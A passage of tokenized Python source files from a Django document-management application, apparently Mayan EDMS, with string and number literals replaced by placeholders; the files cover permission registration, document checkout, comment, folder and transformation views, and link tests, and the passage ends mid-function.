<s> from __future__ import unicode_literals , absolute_import <EOL> import logging <EOL> from permissions . models import StoredPermission <EOL> logger = logging . getLogger ( __name__ ) <EOL> class ModelPermission ( object ) : <EOL> _registry = { } <EOL> _proxies = { } <EOL> _inheritances = { } <EOL> @ classmethod <EOL> def register ( cls , model , permissions ) : <EOL> cls . _registry . setdefault ( model , [ ] ) <EOL> for permission in permissions : <EOL> cls . _registry [ model ] . append ( permission ) <EOL> @ classmethod <EOL> def get_for_instance ( cls , instance ) : <EOL> try : <EOL> permissions = cls . _registry [ type ( instance ) ] <EOL> except KeyError : <EOL> try : <EOL> permissions = cls . _registry [ cls . _proxies [ type ( instance ) ] ] <EOL> except KeyError : <EOL> permissions = ( ) <EOL> pks = [ permission . stored_permission . pk for permission in permissions ] <EOL> return StoredPermission . objects . filter ( pk__in = pks ) <EOL> @ classmethod <EOL> def register_proxy ( cls , source , model ) : <EOL> cls . _proxies [ model ] = source <EOL> @ classmethod <EOL> def register_inheritance ( cls , model , related ) : <EOL> cls . _inheritances [ model ] = related <EOL> @ classmethod <EOL> def get_inheritance ( cls , model ) : <EOL> return cls . _inheritances [ model ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from datetime import timedelta <EOL> from kombu import Exchange , Queue <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from acls import ModelPermission <EOL> from common import MayanAppConfig , menu_facet , menu_main , menu_sidebar <EOL> from documents . models import Document <EOL> from mayan . celery import app <EOL> from rest_api . classes import APIEndPoint <EOL> from . links import ( <EOL> link_checkin_document , link_checkout_document , link_checkout_info , <EOL> link_checkout_list <EOL> ) <EOL> from . literals import CHECK_EXPIRED_CHECK_OUTS_INTERVAL <EOL> from . models import DocumentCheckout <EOL> from . permissions import ( <EOL> permission_document_checkin , permission_document_checkin_override , <EOL> permission_document_checkout <EOL> ) <EOL> from . tasks import task_check_expired_check_outs <EOL> class CheckoutsApp ( MayanAppConfig ) : <EOL> name = '<STR_LIT>' <EOL> test = True <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def ready ( self ) : <EOL> super ( CheckoutsApp , self ) . ready ( ) <EOL> APIEndPoint ( app = self , version_string = '<STR_LIT:1>' ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document , user = None : DocumentCheckout . objects . check_in_document ( document , user ) <EOL> ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document : DocumentCheckout . objects . document_checkout_info ( <EOL> document <EOL> ) <EOL> ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document : DocumentCheckout . objects . document_checkout_state ( <EOL> document <EOL> ) <EOL> ) <EOL> Document . add_to_class ( <EOL> '<STR_LIT>' , <EOL> lambda document : DocumentCheckout . objects . is_document_checked_out ( <EOL> document <EOL> ) <EOL> ) <EOL> ModelPermission . 
register ( <EOL> model = Document , permissions = ( <EOL> permission_document_checkout , <EOL> permission_document_checkin , <EOL> permission_document_checkin_override , <EOL> ) <EOL> ) <EOL> app . conf . CELERYBEAT_SCHEDULE . update ( <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : timedelta ( <EOL> seconds = CHECK_EXPIRED_CHECK_OUTS_INTERVAL <EOL> ) , <EOL> } , <EOL> } <EOL> ) <EOL> app . conf . CELERY_QUEUES . append ( <EOL> Queue ( <EOL> '<STR_LIT>' , Exchange ( '<STR_LIT>' ) , <EOL> routing_key = '<STR_LIT>' , delivery_mode = <NUM_LIT:1> <EOL> ) , <EOL> ) <EOL> app . conf . CELERY_ROUTES . update ( <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } <EOL> ) <EOL> menu_facet . bind_links ( links = ( link_checkout_info , ) , sources = ( Document , ) ) <EOL> menu_main . bind_links ( links = ( link_checkout_list , ) ) <EOL> menu_sidebar . bind_links ( <EOL> links = ( link_checkout_document , link_checkin_document ) , <EOL> sources = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . conf import settings <EOL> from django . utils import timezone , translation <EOL> from . models import UserLocaleProfile <EOL> def user_locale_profile_session_config ( sender , request , user , ** kwargs ) : <EOL> user_locale_profile , created = UserLocaleProfile . objects . get_or_create ( <EOL> user = user <EOL> ) <EOL> if not created and user_locale_profile . timezone and user_locale_profile . language : <EOL> timezone . activate ( user_locale_profile . timezone ) <EOL> translation . activate ( user_locale_profile . language ) <EOL> if hasattr ( request , '<STR_LIT>' ) : <EOL> request . session [ <EOL> translation . LANGUAGE_SESSION_KEY <EOL> ] = user_locale_profile . language <EOL> request . session [ <EOL> settings . TIMEZONE_SESSION_KEY <EOL> ] = user_locale_profile . timezone <EOL> else : <EOL> request . set_cookie ( <EOL> settings . LANGUAGE_COOKIE_NAME , user_locale_profile . language <EOL> ) <EOL> request . set_cookie ( <EOL> settings . TIMEZONE_COOKIE_NAME , user_locale_profile . timezone <EOL> ) <EOL> def user_locale_profile_create ( sender , instance , created , ** kwargs ) : <EOL> if created : <EOL> UserLocaleProfile . objects . create ( user = instance ) </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> import types <EOL> from django . conf import settings <EOL> from django . utils import formats <EOL> from django . utils . datastructures import MultiValueDict <EOL> from django . utils . encoding import force_text <EOL> from django . utils . http import urlquote as django_urlquote <EOL> from django . utils . http import urlencode as django_urlencode <EOL> logger = logging . getLogger ( __name__ ) <EOL> def copyfile ( source , destination , buffer_size = <NUM_LIT> * <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> source_descriptor = get_descriptor ( source ) <EOL> destination_descriptor = get_descriptor ( destination , read = False ) <EOL> while True : <EOL> copy_buffer = source_descriptor . read ( buffer_size ) <EOL> if copy_buffer : <EOL> destination_descriptor . write ( copy_buffer ) <EOL> else : <EOL> break <EOL> source_descriptor . close ( ) <EOL> destination_descriptor . close ( ) <EOL> def encapsulate ( function ) : <EOL> return lambda : function <EOL> def fs_cleanup ( filename , suppress_exceptions = True ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . remove ( filename ) <EOL> except OSError : <EOL> if suppress_exceptions : <EOL> pass <EOL> else : <EOL> raise <EOL> def get_descriptor ( file_input , read = True ) : <EOL> try : <EOL> file_input . seek ( <NUM_LIT:0> ) <EOL> except AttributeError : <EOL> if read : <EOL> return open ( file_input , '<STR_LIT:rb>' ) <EOL> else : <EOL> return open ( file_input , '<STR_LIT:wb>' ) <EOL> else : <EOL> return file_input <EOL> def render_date_object ( date_time_object ) : <EOL> return force_text ( formats . localize ( date_time_object , use_l10n = True ) ) <EOL> def return_attrib ( obj , attrib , arguments = None ) : <EOL> try : <EOL> if isinstance ( attrib , types . FunctionType ) : <EOL> return attrib ( obj ) <EOL> elif isinstance ( <EOL> obj , types . DictType <EOL> ) or isinstance ( obj , types . 
DictionaryType ) : <EOL> return obj [ attrib ] <EOL> else : <EOL> result = reduce ( getattr , attrib . split ( '<STR_LIT:.>' ) , obj ) <EOL> if isinstance ( result , types . MethodType ) : <EOL> if arguments : <EOL> return result ( ** arguments ) <EOL> else : <EOL> return result ( ) <EOL> else : <EOL> return result <EOL> except Exception as exception : <EOL> if settings . DEBUG : <EOL> return '<STR_LIT>' % ( attrib , exception ) <EOL> else : <EOL> return unicode ( exception ) <EOL> def urlquote ( link = None , get = None ) : <EOL> """<STR_LIT>""" <EOL> if get is None : <EOL> get = [ ] <EOL> assert link or get <EOL> if isinstance ( link , dict ) : <EOL> assert not get , get <EOL> get = link <EOL> link = '<STR_LIT>' <EOL> assert isinstance ( get , dict ) , '<STR_LIT>' % type ( get ) <EOL> if get : <EOL> if isinstance ( get , MultiValueDict ) : <EOL> get = get . lists ( ) <EOL> if link : <EOL> link = '<STR_LIT>' % django_urlquote ( link ) <EOL> return '<STR_LIT>' % ( link , django_urlencode ( get , doseq = True ) ) <EOL> else : <EOL> return django_urlquote ( link ) <EOL> def validate_path ( path ) : <EOL> if not os . path . exists ( path ) : <EOL> try : <EOL> os . mkdir ( path ) <EOL> except Exception as exception : <EOL> logger . debug ( '<STR_LIT>' , exception ) <EOL> return False <EOL> try : <EOL> fd , test_filepath = tempfile . mkstemp ( dir = path ) <EOL> os . close ( fd ) <EOL> os . unlink ( test_filepath ) <EOL> except Exception as exception : <EOL> logger . debug ( '<STR_LIT>' , exception ) <EOL> return False <EOL> return True </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import logging <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import Http404 <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from acls . models import AccessControlList <EOL> from common . views import ( <EOL> SingleObjectCreateView , SingleObjectDeleteView , SingleObjectEditView , <EOL> SingleObjectListView <EOL> ) <EOL> from permissions import Permission <EOL> from . models import Transformation <EOL> from . permissions import ( <EOL> permission_transformation_create , permission_transformation_delete , <EOL> permission_transformation_edit , permission_transformation_view <EOL> ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> class TransformationDeleteView ( SingleObjectDeleteView ) : <EOL> model = Transformation <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> self . transformation = get_object_or_404 ( <EOL> Transformation , pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_delete , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_delete , request . user , <EOL> self . transformation . content_object <EOL> ) <EOL> return super ( TransformationDeleteView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . transformation . content_type . app_label , <EOL> self . transformation . content_type . model , <EOL> self . transformation . object_id <EOL> ) <EOL> ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . 
transformation . content_object , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . transformation . content_type . app_label , <EOL> self . transformation . content_type . model , <EOL> self . transformation . object_id <EOL> ) <EOL> ) , <EOL> '<STR_LIT:title>' : _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : self . transformation , <EOL> '<STR_LIT>' : self . transformation . content_object <EOL> } , <EOL> '<STR_LIT>' : self . transformation , <EOL> } <EOL> class TransformationCreateView ( SingleObjectCreateView ) : <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> content_type = get_object_or_404 ( <EOL> ContentType , app_label = self . kwargs [ '<STR_LIT>' ] , <EOL> model = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> self . content_object = content_type . get_object_for_this_type ( <EOL> pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> except content_type . model_class ( ) . DoesNotExist : <EOL> raise Http404 <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_create , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_create , request . user , <EOL> self . content_object <EOL> ) <EOL> return super ( TransformationCreateView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def form_valid ( self , form ) : <EOL> instance = form . save ( commit = False ) <EOL> instance . content_object = self . content_object <EOL> try : <EOL> instance . full_clean ( ) <EOL> instance . save ( ) <EOL> except : <EOL> return super ( TransformationCreateView , self ) . form_invalid ( form ) <EOL> else : <EOL> return super ( TransformationCreateView , self ) . 
form_valid ( form ) <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . kwargs [ '<STR_LIT>' ] , self . kwargs [ '<STR_LIT>' ] , <EOL> self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> def get_queryset ( self ) : <EOL> return Transformation . objects . get_for_model ( self . content_object ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . content_object , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT:title>' : _ ( <EOL> '<STR_LIT>' <EOL> ) % self . content_object , <EOL> } <EOL> class TransformationEditView ( SingleObjectEditView ) : <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> model = Transformation <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> self . transformation = get_object_or_404 ( <EOL> Transformation , pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_edit , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_edit , request . user , <EOL> self . transformation . content_object <EOL> ) <EOL> return super ( TransformationEditView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def form_valid ( self , form ) : <EOL> instance = form . save ( commit = False ) <EOL> try : <EOL> instance . full_clean ( ) <EOL> instance . save ( ) <EOL> except : <EOL> return super ( TransformationEditView , self ) . form_invalid ( form ) <EOL> else : <EOL> return super ( TransformationEditView , self ) . form_valid ( form ) <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( <EOL> self . transformation . content_type . app_label , <EOL> self . transformation . content_type . model , <EOL> self . transformation . 
object_id <EOL> ) <EOL> ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . transformation . content_object , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT:title>' : _ ( <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : self . transformation , <EOL> '<STR_LIT>' : self . transformation . content_object <EOL> } , <EOL> '<STR_LIT>' : self . transformation , <EOL> } <EOL> class TransformationListView ( SingleObjectListView ) : <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> content_type = get_object_or_404 ( <EOL> ContentType , app_label = self . kwargs [ '<STR_LIT>' ] , <EOL> model = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> self . content_object = content_type . get_object_for_this_type ( <EOL> pk = self . kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> except content_type . model_class ( ) . DoesNotExist : <EOL> raise Http404 <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_transformation_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_transformation_view , request . user , <EOL> self . content_object <EOL> ) <EOL> return super ( TransformationListView , self ) . dispatch ( <EOL> request , * args , ** kwargs <EOL> ) <EOL> def get_queryset ( self ) : <EOL> return Transformation . objects . get_for_model ( self . content_object ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . content_object , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . content_object , <EOL> } </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from acls . models import AccessControlList <EOL> from common . generics import ( <EOL> SingleObjectCreateView , SingleObjectDeleteView , SingleObjectListView <EOL> ) <EOL> from documents . models import Document <EOL> from permissions import Permission <EOL> from . models import Comment <EOL> from . permissions import ( <EOL> permission_comment_create , permission_comment_delete , <EOL> permission_comment_view <EOL> ) <EOL> class DocumentCommentCreateView ( SingleObjectCreateView ) : <EOL> fields = ( '<STR_LIT>' , ) <EOL> model = Comment <EOL> object_verbose_name = _ ( '<STR_LIT>' ) <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_comment_create , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_comment_create , request . user , self . get_document ( ) <EOL> ) <EOL> return super ( <EOL> DocumentCommentCreateView , self <EOL> ) . dispatch ( request , * args , ** kwargs ) <EOL> def get_document ( self ) : <EOL> return get_object_or_404 ( Document , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:object>' : self . get_document ( ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_document ( ) , <EOL> } <EOL> def get_instance_extra_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . get_document ( ) , '<STR_LIT:user>' : self . request . user , <EOL> } <EOL> def get_save_extra_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . request . 
user , <EOL> } <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> ) <EOL> class DocumentCommentDeleteView ( SingleObjectDeleteView ) : <EOL> model = Comment <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_comment_delete , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_comment_delete , request . user , <EOL> self . get_object ( ) . document <EOL> ) <EOL> return super ( <EOL> DocumentCommentDeleteView , self <EOL> ) . dispatch ( request , * args , ** kwargs ) <EOL> def get_delete_extra_data ( self ) : <EOL> return { '<STR_LIT>' : self . request . user } <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:object>' : self . get_object ( ) . document , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_object ( ) , <EOL> } <EOL> def get_post_action_redirect ( self ) : <EOL> return reverse ( <EOL> '<STR_LIT>' , <EOL> args = ( self . get_object ( ) . document . pk , ) <EOL> ) <EOL> class DocumentCommentListView ( SingleObjectListView ) : <EOL> def get_document ( self ) : <EOL> return get_object_or_404 ( Document , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> def get_queryset ( self ) : <EOL> try : <EOL> Permission . check_permissions ( <EOL> self . request . user , ( permission_comment_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_comment_view , self . request . user , <EOL> self . get_document ( ) <EOL> ) <EOL> return self . get_document ( ) . comments . all ( ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:object>' : self . get_document ( ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_document ( ) , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . html import mark_safe <EOL> from django . utils . translation import ugettext <EOL> from . models import IndexInstanceNode <EOL> def get_instance_link ( index_instance_node , text = None , simple = False ) : <EOL> """<STR_LIT>""" <EOL> if simple : <EOL> template = '<STR_LIT>' <EOL> else : <EOL> template = '<STR_LIT>' <EOL> return template % { <EOL> '<STR_LIT:url>' : index_instance_node . get_absolute_url ( ) , <EOL> '<STR_LIT:value>' : text if text else ( <EOL> index_instance_node if index_instance_node . parent else index_instance_node . index_template_node . index <EOL> ) <EOL> } <EOL> def get_breadcrumbs ( index_instance_node , simple = False , single_link = False , include_count = False ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> if single_link : <EOL> simple = True <EOL> for instance in index_instance_node . get_ancestors ( ) : <EOL> result . append ( get_instance_link ( instance , simple = simple ) ) <EOL> result . append ( get_instance_link ( index_instance_node , simple = simple ) ) <EOL> output = [ ] <EOL> if include_count : <EOL> output . append ( '<STR_LIT>' % index_instance_node . documents . count ( ) ) <EOL> if single_link : <EOL> output . insert ( <EOL> <NUM_LIT:0> , get_instance_link ( <EOL> index_instance_node = index_instance_node , text = ( <EOL> '<STR_LIT>' . join ( result ) <EOL> ) <EOL> ) <EOL> ) <EOL> return mark_safe ( '<STR_LIT:U+0020>' . join ( output ) ) <EOL> else : <EOL> output . insert ( <NUM_LIT:0> , '<STR_LIT>' . join ( result ) ) <EOL> return mark_safe ( '<STR_LIT:U+0020>' . join ( output ) ) <EOL> def index_instance_item_link ( index_instance_item ) : <EOL> if isinstance ( index_instance_item , IndexInstanceNode ) : <EOL> if index_instance_item . index_template_node . 
link_documents : <EOL> icon_template = '<STR_LIT>' <EOL> else : <EOL> icon_template = '<STR_LIT>' <EOL> else : <EOL> icon_template = '<STR_LIT>' <EOL> return mark_safe ( <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT:url>' : index_instance_item . get_absolute_url ( ) , <EOL> '<STR_LIT>' : icon_template , <EOL> '<STR_LIT:text>' : index_instance_item <EOL> } <EOL> ) <EOL> def node_level ( node ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( <EOL> '<STR_LIT>' . join ( <EOL> [ <EOL> '<STR_LIT>' * ( <EOL> getattr ( node , node . _mptt_meta . level_attr ) - <NUM_LIT:1> <EOL> ) , '<STR_LIT>' if node . is_root_node ( ) else '<STR_LIT>' , <EOL> ugettext ( '<STR_LIT>' ) if node . is_root_node ( ) else unicode ( node ) <EOL> ] <EOL> ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> TEST_WORKFLOW_LABEL = '<STR_LIT>' <EOL> TEST_WORKFLOW_INITIAL_STATE_LABEL = '<STR_LIT>' <EOL> TEST_WORKFLOW_INITIAL_STATE_COMPLETION = <NUM_LIT> <EOL> TEST_WORKFLOW_STATE_LABEL = '<STR_LIT>' <EOL> TEST_WORKFLOW_STATE_COMPLETION = <NUM_LIT> <EOL> TEST_WORKFLOW_TRANSITION_LABEL = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:label>' , <EOL> field = models . CharField ( <EOL> unique = True , max_length = <NUM_LIT:32> , verbose_name = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . core . files import File <EOL> from django . core . urlresolvers import reverse <EOL> from acls . models import AccessControlList <EOL> from user_management . tests . literals import ( <EOL> TEST_USER_PASSWORD , TEST_USER_USERNAME <EOL> ) <EOL> from . . links import ( <EOL> link_document_version_download , link_document_version_revert <EOL> ) <EOL> from . . permissions import ( <EOL> permission_document_download , permission_document_version_revert <EOL> ) <EOL> from . literals import TEST_SMALL_DOCUMENT_PATH <EOL> from . test_views import GenericDocumentViewTestCase <EOL> class DocumentsLinksTestCase ( GenericDocumentViewTestCase ) : <EOL> def test_document_version_revert_link_no_permission ( self ) : <EOL> with open ( TEST_SMALL_DOCUMENT_PATH ) as file_object : <EOL> self . document . new_version ( file_object = File ( file_object ) ) <EOL> self . assertTrue ( self . document . versions . count ( ) , <NUM_LIT:2> ) <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> self . add_test_view ( test_object = self . document . versions . first ( ) ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_revert . resolve ( context = context ) <EOL> self . assertEqual ( resolved_link , None ) <EOL> def test_document_version_revert_link_with_permission ( self ) : <EOL> with open ( TEST_SMALL_DOCUMENT_PATH ) as file_object : <EOL> self . document . new_version ( file_object = File ( file_object ) ) <EOL> self . assertTrue ( self . document . versions . count ( ) , <NUM_LIT:2> ) <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> acl = AccessControlList . objects . create ( <EOL> content_object = self . document , role = self . role <EOL> ) <EOL> acl . permissions . add ( <EOL> permission_document_version_revert . stored_permission <EOL> ) <EOL> self . add_test_view ( test_object = self . document . 
versions . first ( ) ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_revert . resolve ( context = context ) <EOL> self . assertNotEqual ( resolved_link , None ) <EOL> self . assertEqual ( <EOL> resolved_link . url , <EOL> reverse ( <EOL> '<STR_LIT>' , <EOL> args = ( self . document . versions . first ( ) . pk , ) <EOL> ) <EOL> ) <EOL> def test_document_version_download_link_no_permission ( self ) : <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> self . add_test_view ( test_object = self . document . latest_version ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_download . resolve ( context = context ) <EOL> self . assertEqual ( resolved_link , None ) <EOL> def test_document_version_download_link_with_permission ( self ) : <EOL> self . login ( username = TEST_USER_USERNAME , password = TEST_USER_PASSWORD ) <EOL> acl = AccessControlList . objects . create ( <EOL> content_object = self . document , role = self . role <EOL> ) <EOL> acl . permissions . add ( permission_document_download . stored_permission ) <EOL> self . add_test_view ( test_object = self . document . latest_version ) <EOL> context = self . get_test_view ( ) <EOL> resolved_link = link_document_version_download . resolve ( context = context ) <EOL> self . assertNotEqual ( resolved_link , None ) <EOL> self . assertEqual ( <EOL> resolved_link . url , <EOL> reverse ( <EOL> '<STR_LIT>' , <EOL> args = ( self . document . latest_version . pk , ) <EOL> ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from actstream . models import Action <EOL> from common import MayanAppConfig , menu_tools <EOL> from common . classes import Package <EOL> from navigation import SourceColumn <EOL> from . links import link_events_list <EOL> from . widgets import event_type_link <EOL> class EventsApp ( MayanAppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def ready ( self ) : <EOL> super ( EventsApp , self ) . ready ( ) <EOL> Package ( label = '<STR_LIT>' , license_text = '''<STR_LIT>''' ) <EOL> SourceColumn ( <EOL> source = Action , label = _ ( '<STR_LIT>' ) , attribute = '<STR_LIT>' <EOL> ) <EOL> SourceColumn ( source = Action , label = _ ( '<STR_LIT>' ) , attribute = '<STR_LIT>' ) <EOL> SourceColumn ( <EOL> source = Action , label = _ ( '<STR_LIT>' ) , <EOL> func = lambda context : event_type_link ( context [ '<STR_LIT:object>' ] ) <EOL> ) <EOL> menu_tools . bind_links ( links = ( link_events_list , ) ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import logging <EOL> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . urlresolvers import reverse , reverse_lazy <EOL> from django . http import HttpResponseRedirect <EOL> from django . shortcuts import get_object_or_404 , render_to_response <EOL> from django . template import RequestContext <EOL> from django . utils . translation import ugettext_lazy as _ , ungettext <EOL> from acls . models import AccessControlList <EOL> from common . views import ( <EOL> SingleObjectCreateView , SingleObjectEditView , SingleObjectListView <EOL> ) <EOL> from documents . permissions import permission_document_view <EOL> from documents . models import Document <EOL> from documents . views import DocumentListView <EOL> from permissions import Permission <EOL> from . forms import FolderListForm <EOL> from . models import Folder <EOL> from . permissions import ( <EOL> permission_folder_add_document , permission_folder_create , <EOL> permission_folder_delete , permission_folder_edit , permission_folder_view , <EOL> permission_folder_remove_document <EOL> ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> class FolderEditView ( SingleObjectEditView ) : <EOL> fields = ( '<STR_LIT:label>' , ) <EOL> model = Folder <EOL> object_permission = permission_folder_edit <EOL> post_action_redirect = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:object>' : self . get_object ( ) , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_object ( ) , <EOL> } <EOL> class FolderListView ( SingleObjectListView ) : <EOL> object_permission = permission_folder_view <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def get_folder_queryset ( self ) : <EOL> return Folder . 
objects . all ( ) <EOL> def get_queryset ( self ) : <EOL> self . queryset = self . get_folder_queryset ( ) <EOL> return super ( FolderListView , self ) . get_queryset ( ) <EOL> class FolderCreateView ( SingleObjectCreateView ) : <EOL> fields = ( '<STR_LIT:label>' , ) <EOL> model = Folder <EOL> view_permission = permission_folder_create <EOL> def form_valid ( self , form ) : <EOL> try : <EOL> Folder . objects . get ( <EOL> label = form . cleaned_data [ '<STR_LIT:label>' ] , user = self . request . user <EOL> ) <EOL> except Folder . DoesNotExist : <EOL> instance = form . save ( commit = False ) <EOL> instance . user = self . request . user <EOL> instance . save ( ) <EOL> return super ( FolderCreateView , self ) . form_valid ( form ) <EOL> else : <EOL> messages . error ( <EOL> self . request , <EOL> _ ( <EOL> '<STR_LIT>' <EOL> ) % form . cleaned_data [ '<STR_LIT:label>' ] <EOL> ) <EOL> return super ( FolderCreateView , self ) . form_invalid ( form ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def folder_delete ( request , folder_id ) : <EOL> folder = get_object_or_404 ( Folder , pk = folder_id ) <EOL> try : <EOL> Permission . check_permissions ( request . user , ( 